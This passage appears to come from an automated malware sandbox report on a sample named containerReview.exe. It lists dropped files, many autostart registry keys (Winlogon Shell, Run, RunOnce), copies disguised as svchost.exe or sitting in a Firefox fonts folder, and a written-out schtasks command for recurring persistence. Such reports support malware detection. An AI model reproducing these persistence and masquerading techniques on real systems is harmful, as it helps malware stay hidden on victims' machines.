                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\zRrwKlet.logJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\hEPrrPJe.logJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\XWvbHmEw.logJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\FJTVnRjh.logJump to dropped file

                                      Boot Survival

                                      barindex
                                      Creates an undocumented autostart registry key
                                      Source: C:\blockcomSession\containerReview.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                      Source: C:\blockcomSession\containerReview.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                      Source: C:\blockcomSession\containerReview.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                      Source: C:\blockcomSession\containerReview.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                      Source: C:\blockcomSession\containerReview.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                      Source: C:\blockcomSession\containerReview.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                      Creates multiple autostart registry keys
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReview
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smss
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                      Uses schtasks.exe or at.exe to add and modify task schedules
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\blockcomSession\Idle.exe'" /f
                                      Source: C:\Windows\Resources\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccessJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smss
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smss
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReview
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReview
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReview
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReview
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
                                      Source: C:\Users\user\Desktop\fatality.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
